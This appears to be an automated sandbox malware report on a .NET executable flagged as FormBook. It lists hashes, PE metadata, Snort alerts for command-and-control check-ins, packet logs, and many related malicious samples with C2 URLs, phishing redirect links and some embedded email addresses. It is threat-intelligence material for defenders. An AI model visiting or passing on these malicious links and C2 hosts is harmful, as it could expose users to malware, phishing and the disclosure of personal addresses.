192.185.0.218	SEA LION LOGISTICS-URGENT QUOTATION.exe	Get hash	malicious	Browse	www.lfalab.com/oge8/?abvDxBr=UGLAMmk2DZVWnssYuuh7HdOer1dwtGufn/A5XtWCHrl9N+InM5/ONbQG1yxSluBQOtZY&pPU=EFQxUL1HhHpL
	IMG-033-040.exe	Get hash	malicious	Browse	www.casabreo.com/o56q/?AR-pA8=djItCF3xQPxp&rTdHh=a/qh/A/EtxPC42XtQSw2Uj+1aIgsnoOP4dSPguYoQXjtVYsl8+96mgp2QzxWG2Pq/i+FrqbYbA==
	vbc.exe	Get hash	malicious	Browse	www.casabreo.com/o56q/?ndlpdH=a/qh/A/EtxPC42XtQSw2Uj+1aIgsnoOP4dSPguYoQXjtVYsl8+96mgp2Qz9WVmDpmy+T&v48p-=1bjHLJKXgdz49L7p
	DEBIT NOTE DB-1130.exe	Get hash	malicious	Browse	www.volksautomobile.com/ihm3/?sBZ4lrK=7xSN3P7TDi8j49AuzLkYZC2J38lIcTrpxbYKUbA+qkC4Tj6Ie5VvdlxLwD4cHtvztoRkkfBvyQ==&FPcT7b=djCDfFRXOP7H
	#Uc720#Ud2f0#Uc544#Uc774#Ud14c#Ud06c-#Ubc1c#Uc8fc#Uc11c #Uc1a1#Ubd80#Uc758#Uac74.exe.exe	Get hash	malicious	Browse	www.sunappletree.com/5bs/?1bxdA=S0vP/PVDivLkRGwA5ypirRNC/D8rTRYhUpf7ovNAaT7mu+JDYCYzhMxXJbq/asT2WA9p&LjZh-=iL08qZV
	RFQ Specification BINIF0866.exe	Get hash	malicious	Browse	www.rescuestack.com/aqu2/?iJE=b/+HScDb2/nnp+wE3H/psFuU30BiVkE+glOeG3timk9xGcZmD+3A21DtxG5D/EoOsBf9&tXR=NZiHaV
	own.exe	Get hash	malicious	Browse	www.rentabrokers.com/ewbc/?af8LPhIX=xtLJc26/HwvOSljQMCNyJ/8cwZ9CooZtWKyo6WLdOuXzNED74ZrkjeRROQ6kZLHF7KxP&DVm8c=Ylu4sfXHq8_
	nova narud#U017eba.exe	Get hash	malicious	Browse	www.weddingstatement.com/kvsz/?bpULEn_p=oF9lm8+l/ZCbkrxAB/H8LSeoLTaFub9uhOdqnUiu+xeOE/5xLoVQAJ9NUnetZ3QCZy9f&TbUD3=oH9PHzvXDlnDV
	14DOC687453456565097665434 PDF.exe	Get hash	malicious	Browse	www.postproduction.online/pe/?5jsx-=jbcDBXuF9v0DHbzHpZadAYMNh9kmJYlTuTExuwX9CIHGLgFRTEYJBUEUsOkByD39uPC++daR5qEYn7FYVO8A&GL0l=pTL4sLjp10X0Kt_p
	Scaned Contract Ref 4FA444.exe	Get hash	malicious	Browse	www.outstandingapps.com/tr/?id=twaG1VR7vePNrcZCPkw3slwhkZX8Asjdj9KLCM0uHjZ7uVvde9Px6jqMMe9vXpU21JqlUA2sc9G35wFL6ruSBg==&9rj=z8TpS
	21AZZWCT.exe	Get hash	malicious	Browse	www.elisabethday.com/ol/
	39NEOY.exeRNOX.exe	Get hash	malicious	Browse	www.elisabethday.com/ol/?id=ghDVzpmfKkjQVBqfz7nwHD+LEA45OcEP6+cZUG6hjNpuWx0z5vFJNMBF8TCggDsDvPLElSrIW+0kHiAX3xmKNw==&8pBXn=0z7pZl18
	67New Spec. Order.exe	Get hash	malicious	Browse	www.elisabethday.com/ol/?id=ghDVzpmfKkjQVBqfz7nwHD+LEA45OcEP6+cZUG6hjNpuWx0z5vFJNMBF8TCggDsDvPLElSrIW+0kHiAX3xmKNw==&z8Tp=eDfXnp00vJ
	Transfer Copy.exe	Get hash	malicious	Browse	www.alphonsomurray.com/pc1/?id=DF9x7rmBeyoJ8SdXJ8jgu7bMnMVTskceJwG6BGkVkdctKnT0PtCDqy5wvrFkrkUXeKelqHeGu0VXVVWIEaN-5w..&sql=1
	56PO 370.exe	Get hash	malicious	Browse	www.vidasuciamc.com/kd/?mh=IrGhLH&7n-=XxIRQjNcAj216WrLmu7/s9//xufkmX8mYhf0TytMYOe2dO/s0MZk17HMCSzagT2Qld1xrq5I47TyVpPBTAAE
	30order confimation.exe	Get hash	malicious	Browse	www.arepaslatinfood.com/ko/?6lzxw48h=sFwCIgP4ANwoo1PT5mMA/thLg8Ax/ohOVHMGhRV6eEe9v2CcTvPjNoBBY8WFYfM9X/Wl&OJEPeL=nP98bhr0GDMh

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Chrome.exe	Get hash	malicious	Browse	162.159.135.232
	QPR-1064.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Matrix.exe	Get hash	malicious	Browse	172.67.134.127
	JAAkR51fQY.exe	Get hash	malicious	Browse	104.21.13.175
	cremocompany-Invoice_216083-xlsx.html	Get hash	malicious	Browse	104.16.19.94
	VANGUARD PAYMENT ADVICE.htm	Get hash	malicious	Browse	104.31.67.162
	IMG_2021_01_13_1_RFQ_PO_1832938.doc	Get hash	malicious	Browse	104.28.5.151
	IMG_2021_01_13_1_RFQ_PO_1832938.exe	Get hash	malicious	Browse	104.28.4.151
	sample20210113-01.xlsm	Get hash	malicious	Browse	104.24.124.127
	Byrnes Gould PLLC.odt	Get hash	malicious	Browse	104.16.19.94
	aNmkT4KLJX.exe	Get hash	malicious	Browse	104.23.98.190
	BankSwiftCopyUSD95000.ppt	Get hash	malicious	Browse	104.18.49.20
	brewin-Invoice024768-xlsx.Html	Get hash	malicious	Browse	104.16.19.94
	Pokana2021011357.doc	Get hash	malicious	Browse	172.67.195.152
	09000000000000h.exe	Get hash	malicious	Browse	172.67.188.154
	PO#218740.exe	Get hash	malicious	Browse	172.67.164.253
	PO-5042.exe	Get hash	malicious	Browse	104.28.4.151
	PO-000202112.exe	Get hash	malicious	Browse	172.67.151.49
	20210113155320.exe	Get hash	malicious	Browse	66.235.200.145
	13012021.exe	Get hash	malicious	Browse	23.227.38.74
SOFTLAYERUS	i	Get hash	malicious	Browse	67.19.147.226
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	159.253.128.188
	Audio_47720.wavv - - Copy.htm	Get hash	malicious	Browse	158.176.79.200
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffdd20158061a40259d693dea2ef9e1a5.svc.dynamics.com%2ft%2fr%2fK7SXmXZktiYcLfGnV8W6kGbWfZ8XPa0UR5w2NZxfqT8%23paul.scott%40growwithfnb.com%3a3893%3d3&c=E,1,9l-G5uJVDWDU8_wOtjfPvUbxvV9wTD-85X3TIVaryjCSjAnd5Je-5QjgYqWMGifoOmLqLqsarlv-jRvivFnFGLD08lo9MjB3LxBx-DYDF6fhZ2OF&typo=1	Get hash	malicious	Browse	158.175.115.200
	http://getfreshnews.com/nuoazaojrnvenpyxyse	Get hash	malicious	Browse	159.253.128.183
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f31c462c0f45d449c88055b8c23df7863.svc.dynamics.com%2ft%2fr%2fIofGGuGvOuh_i3k4U-jBzfE1u1yg9kHPBS0stRfoX3U%23rbartel%40murexltd.com%3a380%3d009&c=E,1,xP0RSUBtZVNwakaYXBLYnh2Aer2HVIwJdidGVeOhulL1sp9Nz6ix3XUeizBZxcVT0pOPcjsfxu1c2ehXg7iv-OghYMiZvZIGOr0QzAyBnhA8vRMsgY35uBOS2A,,&typo=1	Get hash	malicious	Browse	169.46.89.154
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f31c462c0f45d449c88055b8c23df7863.svc.dynamics.com%2ft%2fr%2fIofGGuGvOuh_i3k4U-jBzfE1u1yg9kHPBS0stRfoX3U%23mgalaviz%40murexltd.com%3a380%3d009&c=E,1,LMuEnBQUsm17bMEtLoMTU2ivZg9c10KfgK_E949LlJ5Zl-hL3DPxXCJN5T4Fcv7bFlAxGYjEjJS64lSY648yLvhn5eRhmGjqvD2BRBLFeyCaZLqWxIP2keZJqOE,&typo=1	Get hash	malicious	Browse	169.46.89.154
	https://sharepointsfile.eu-gb.cf.appdomain.cloud/redirect/?param=YW50d2VycGVuLmNlbnRydW1AY20uYmU=	Get hash	malicious	Browse	158.176.79.200
	utox.exe	Get hash	malicious	Browse	85.203.45.12
	s1jFCdRJWD.exe	Get hash	malicious	Browse	172.111.192.30
	https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FR	Get hash	malicious	Browse	159.8.107.254
	SMA121920.exe	Get hash	malicious	Browse	52.117.211.114
	New Vendor - Setup Form.exe	Get hash	malicious	Browse	50.97.186.163
	https://sharia-point.us-south.cf.appdomain.cloud/redirect/?email=Kristine_Bridges@baylor.edu&data=04\|01\|Kristine_Bridges@baylor.edu\|a64194d2378542e06dfc08d8a2802868\|22d2fb35256a459bbcf4dc23d42dc0a4\|0\|0\|637438018615913999\|Unknown\|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=\|0&sdata=smYCgJbR96G/HzImvOXjT6991bTFo5/ZZGjJwucJySM=&reserved=0	Get hash	malicious	Browse	169.62.254.82
	https://survey.alchemer.com/s3/6089047/Contract-Addendum	Get hash	malicious	Browse	169.50.137.190
	https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343	Get hash	malicious	Browse	169.50.137.190
	https://greens.us-south.cf.appdomain.cloud/smain/?op=c2FsZXNAZm9yZHdheS5jb20=&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488	Get hash	malicious	Browse	169.46.89.154
	rtgs_pdf.exe	Get hash	malicious	Browse	50.97.186.164
	https://feeds.eu-gb.cf.appdomain.cloud/redirect/?email=sales@fordway.com	Get hash	malicious	Browse	141.125.73.152
	https://901c5967cfa749e4868ebfd8398c3885.svc.dynamics.com/t/r/Q7S69AKU5cfMdZm6Wiy7rVvSMcARpFDrhoPhruYRCXQ#billsgates@apple.com:9ef73999=00	Get hash	malicious	Browse	169.47.124.25
AS-26496-GO-DADDY-COM-LLCUS	20210113432.exe	Get hash	malicious	Browse	184.168.131.241
	YvGnm93rap.exe	Get hash	malicious	Browse	184.168.131.241
	13-01-21.xlsx	Get hash	malicious	Browse	184.168.131.241
	PO85937758859777.xlsx	Get hash	malicious	Browse	184.168.131.241
	20210111 Virginie.exe	Get hash	malicious	Browse	184.168.131.241
	Documento.doc	Get hash	malicious	Browse	107.180.2.39
	5DY3NrVgpI.exe	Get hash	malicious	Browse	192.169.223.13
	cGLVytu1ps.exe	Get hash	malicious	Browse	184.168.131.241
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	184.168.131.241
	Project review_Pdf.exe	Get hash	malicious	Browse	107.180.44.126
	Revise Order.exe	Get hash	malicious	Browse	184.168.131.241
	Info.doc	Get hash	malicious	Browse	107.180.2.39
	mensaje.doc	Get hash	malicious	Browse	107.180.2.39
	PO890299700006.xlsx	Get hash	malicious	Browse	184.168.131.241
	Consignment Details.exe	Get hash	malicious	Browse	166.62.10.185
	yaQjVEGNEb.exe	Get hash	malicious	Browse	184.168.131.241
	Shipping Documents PL&BL Draft.exe	Get hash	malicious	Browse	184.168.131.241
	Purchase Order -263.exe	Get hash	malicious	Browse	184.168.131.241
	order no. 43453.exe	Get hash	malicious	Browse	198.71.232.3
	btVnDhh5K7.exe	Get hash	malicious	Browse	184.168.131.241

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.log Download File
Process:	C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.165394379826869
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	JdtN8nIcLi8RQOi.exe
File size:	842240
MD5:	aee550440966b0bd34d9ccb2b1f7f146
SHA1:	14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
SHA256:	d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
SHA512:	7a81e4fec8c21339eb051205ad5a84fd3db07b4e330b9911b740d1382f4a084b812217312ec3e97a63ffc22ea260a7f2a2d9c8fc463881cabf7d2392e038d894
SSDEEP:	12288:XkIYTA00cOkUWBGzW9R5h2ZDilvWozrGX:KWUGz6hMDsWozK
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	0659d8d4dcd8134c

Static PE Info

General
Entrypoint:	0x4be4c6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FFF05FC [Wed Jan 13 14:38:52 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v2.0.50727
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbe474	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x10ee4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbc4cc	0xbc600	False	0.670309389516	data	7.21231975694	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x10ee4	0x11000	False	0.0654871323529	data	3.2668947264	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc0130	0x10828	data
RT_GROUP_ICON	0xd0958	0x14	data
RT_VERSION	0xd096c	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0xd0cf8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2011
Assembly Version	1.0.0.0
InternalName	ThreeElementAsyncLocalValueMap.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	FileReplacement
ProductVersion	1.0.0.0
FileDescription	FileReplacement
OriginalFilename	ThreeElementAsyncLocalValueMap.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-21:40:06.887570	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49762	80	192.168.2.4	104.18.45.60
01/13/21-21:40:06.887570	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49762	80	192.168.2.4	104.18.45.60
01/13/21-21:40:06.887570	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49762	80	192.168.2.4	104.18.45.60
01/13/21-21:40:07.314032	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49762	104.18.45.60	192.168.2.4
01/13/21-21:40:14.786267	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49768	34.102.136.180	192.168.2.4
01/13/21-21:40:56.048911	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	34.102.136.180
01/13/21-21:40:56.048911	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	34.102.136.180
01/13/21-21:40:56.048911	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	34.102.136.180
01/13/21-21:40:56.187163	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49776	34.102.136.180	192.168.2.4
01/13/21-21:41:06.700106	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49777	80	192.168.2.4	192.185.0.218
01/13/21-21:41:06.700106	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49777	80	192.168.2.4	192.185.0.218
01/13/21-21:41:06.700106	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49777	80	192.168.2.4	192.185.0.218
01/13/21-21:41:38.560393	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.4	198.54.117.244
01/13/21-21:41:38.560393	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.4	198.54.117.244
01/13/21-21:41:38.560393	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.4	198.54.117.244
01/13/21-21:41:44.011374	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49781	34.102.136.180	192.168.2.4
01/13/21-21:41:54.395768	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49783	80	192.168.2.4	104.18.45.60
01/13/21-21:41:54.395768	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49783	80	192.168.2.4	104.18.45.60
01/13/21-21:41:54.395768	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49783	80	192.168.2.4	104.18.45.60
01/13/21-21:41:54.788088	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49783	104.18.45.60	192.168.2.4
01/13/21-21:41:59.979944	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49784	34.102.136.180	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:40:01.428497076 CET	49759	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:40:01.588248014 CET	80	49759	52.116.52.25	192.168.2.4
Jan 13, 2021 21:40:01.588378906 CET	49759	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:40:01.588515997 CET	49759	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:40:01.747723103 CET	80	49759	52.116.52.25	192.168.2.4
Jan 13, 2021 21:40:01.747785091 CET	80	49759	52.116.52.25	192.168.2.4
Jan 13, 2021 21:40:01.747821093 CET	80	49759	52.116.52.25	192.168.2.4
Jan 13, 2021 21:40:01.747997046 CET	49759	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:40:01.750302076 CET	49759	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:40:01.909440041 CET	80	49759	52.116.52.25	192.168.2.4
Jan 13, 2021 21:40:06.837146997 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:06.887345076 CET	80	49762	104.18.45.60	192.168.2.4
Jan 13, 2021 21:40:06.887456894 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:06.887569904 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:06.937866926 CET	80	49762	104.18.45.60	192.168.2.4
Jan 13, 2021 21:40:07.314032078 CET	80	49762	104.18.45.60	192.168.2.4
Jan 13, 2021 21:40:07.314054966 CET	80	49762	104.18.45.60	192.168.2.4
Jan 13, 2021 21:40:07.314274073 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:07.314368963 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:07.314476967 CET	80	49762	104.18.45.60	192.168.2.4
Jan 13, 2021 21:40:07.314594030 CET	49762	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:40:12.394632101 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:12.435339928 CET	80	49768	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:12.435442924 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:12.435581923 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:12.515372992 CET	80	49768	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:12.945112944 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:13.257524967 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:13.867010117 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:14.786267042 CET	80	49768	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:14.786432028 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:14.826644897 CET	80	49768	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:14.826752901 CET	49768	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:18.146260977 CET	49770	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:40:18.267848015 CET	80	49770	66.96.147.112	192.168.2.4
Jan 13, 2021 21:40:18.268002033 CET	49770	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:40:18.268443108 CET	49770	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:40:18.390229940 CET	80	49770	66.96.147.112	192.168.2.4
Jan 13, 2021 21:40:18.403419018 CET	80	49770	66.96.147.112	192.168.2.4
Jan 13, 2021 21:40:18.403451920 CET	80	49770	66.96.147.112	192.168.2.4
Jan 13, 2021 21:40:18.403599977 CET	49770	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:40:18.403798103 CET	49770	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:40:18.525497913 CET	80	49770	66.96.147.112	192.168.2.4
Jan 13, 2021 21:40:28.577955008 CET	49771	80	192.168.2.4	107.180.50.162
Jan 13, 2021 21:40:28.708549976 CET	80	49771	107.180.50.162	192.168.2.4
Jan 13, 2021 21:40:28.708681107 CET	49771	80	192.168.2.4	107.180.50.162
Jan 13, 2021 21:40:28.708831072 CET	49771	80	192.168.2.4	107.180.50.162
Jan 13, 2021 21:40:28.838772058 CET	80	49771	107.180.50.162	192.168.2.4
Jan 13, 2021 21:40:28.856754065 CET	80	49771	107.180.50.162	192.168.2.4
Jan 13, 2021 21:40:28.856844902 CET	80	49771	107.180.50.162	192.168.2.4
Jan 13, 2021 21:40:28.857040882 CET	49771	80	192.168.2.4	107.180.50.162
Jan 13, 2021 21:40:28.857084036 CET	49771	80	192.168.2.4	107.180.50.162
Jan 13, 2021 21:40:28.987709999 CET	80	49771	107.180.50.162	192.168.2.4
Jan 13, 2021 21:40:33.971158028 CET	49772	80	192.168.2.4	104.21.26.55
Jan 13, 2021 21:40:34.011370897 CET	80	49772	104.21.26.55	192.168.2.4
Jan 13, 2021 21:40:34.011513948 CET	49772	80	192.168.2.4	104.21.26.55
Jan 13, 2021 21:40:34.011687994 CET	49772	80	192.168.2.4	104.21.26.55
Jan 13, 2021 21:40:34.051744938 CET	80	49772	104.21.26.55	192.168.2.4
Jan 13, 2021 21:40:34.063383102 CET	80	49772	104.21.26.55	192.168.2.4
Jan 13, 2021 21:40:34.063654900 CET	49772	80	192.168.2.4	104.21.26.55
Jan 13, 2021 21:40:34.063942909 CET	80	49772	104.21.26.55	192.168.2.4
Jan 13, 2021 21:40:34.064101934 CET	49772	80	192.168.2.4	104.21.26.55
Jan 13, 2021 21:40:34.104882002 CET	80	49772	104.21.26.55	192.168.2.4
Jan 13, 2021 21:40:39.168009996 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:39.319611073 CET	80	49773	5.181.218.55	192.168.2.4
Jan 13, 2021 21:40:39.319725990 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:39.319844007 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:39.470227957 CET	80	49773	5.181.218.55	192.168.2.4
Jan 13, 2021 21:40:39.806788921 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:39.995102882 CET	80	49773	5.181.218.55	192.168.2.4
Jan 13, 2021 21:40:40.836158037 CET	80	49773	5.181.218.55	192.168.2.4
Jan 13, 2021 21:40:40.836997032 CET	80	49773	5.181.218.55	192.168.2.4
Jan 13, 2021 21:40:40.837148905 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:40.838443995 CET	49773	80	192.168.2.4	5.181.218.55
Jan 13, 2021 21:40:50.229949951 CET	49775	80	192.168.2.4	219.94.203.152
Jan 13, 2021 21:40:50.540981054 CET	80	49775	219.94.203.152	192.168.2.4
Jan 13, 2021 21:40:50.541208982 CET	49775	80	192.168.2.4	219.94.203.152
